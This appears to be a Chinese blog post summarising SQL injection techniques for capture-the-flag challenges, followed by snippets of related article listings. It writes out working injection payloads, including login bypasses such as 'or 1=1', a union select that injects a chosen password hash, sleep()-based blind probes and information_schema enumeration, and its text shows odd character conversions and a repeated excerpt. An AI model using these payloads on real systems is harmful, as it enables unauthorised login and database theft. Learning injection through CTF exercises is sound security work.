ctf中的sql注入的思路總結
1.拿到題目之後一般是乙個登陸框(大概率盲注或者是報錯,寫指令碼跑):
嘗試輸入使用者名稱(admin)和密碼(隨意)檢視其返回結果這裡一般又分為兩種:
有返回是密碼錯誤還是使用者名稱錯誤
只是單一的返回登陸失敗
對於第一種情況就可以直接嘗試在username
之後輸入payload的了
payload對於第二種情況就稍微要複雜一些了and length('關鍵字')>0
^length('關鍵字')>0
username=reborn'='&password=reborn'='
=>select * from user where username='reborn'=' and password='reborn'='
=>select * from user where 1 and 1
username=' or 1=1 %23&password=123456
username=admicsfn' union select '25d55ad283aa400af464c76d713c07ad'%23&password=12345678
利用不存在的使用者再去構造乙個密碼來進行登陸
2.題目是get注入(大概率是回顯注入)
判斷注入點
利用order by判斷字段數
union select 1,2,3,...%23
判斷具體哪個字段存在回顯
利用字典跑一下被過濾的特殊符號和關鍵字(判斷語句一般使用length(),and或者異或,再或者就是直接輸入)
最後利用information_schema爆出庫名,表名,欄位名以及flag
3.頁面直接返回注入結果(insert等其他型別的注入,考慮時間盲注)
可以使用' and sleep(5)='1'='1
或' and sleep(5)='1'='1' %23
來判斷sleep()能否執行
SQL注入學習
通常情況下,可能存在 sql 注入漏洞的 url 是類似這種形式 對 sql 注入的判斷,主要有兩個方面 可能存在 sql 注入攻擊的 asp php jsp 動態網頁中,乙個動態網頁中可能只有乙個引數,有時可能有多個引數。有時是整型引數,有時是字串型引數,不能一概而論。總之只要是帶有引數的 動態網...
SQL注入學習
2018 02 03 grant 授權語句 revoke 取消許可權 get 方式url的後面可以跟上?query語句 post方式可以上傳檔案或表單 cookie 需要關注的注入點 構造語句 admin or 1 1 回顯 使用union聯合語句 正常可執行 不正常會報錯 不回顯的叫盲注 whal...
SQL注入學習總結 三 SQL注入的思路總結
ctf中的sql注入的思路總結 1.拿到題目之後一般是乙個登陸框 大概率盲注或者是報錯,寫指令碼跑 嘗試輸入使用者名稱 admin 和密碼 隨意 檢視其返回結果這裡一般又分為兩種 有返回是密碼錯誤還是使用者名稱錯誤 只是單一的返回登陸失敗 對於第一種情況就可以直接嘗試在username之後輸入pay...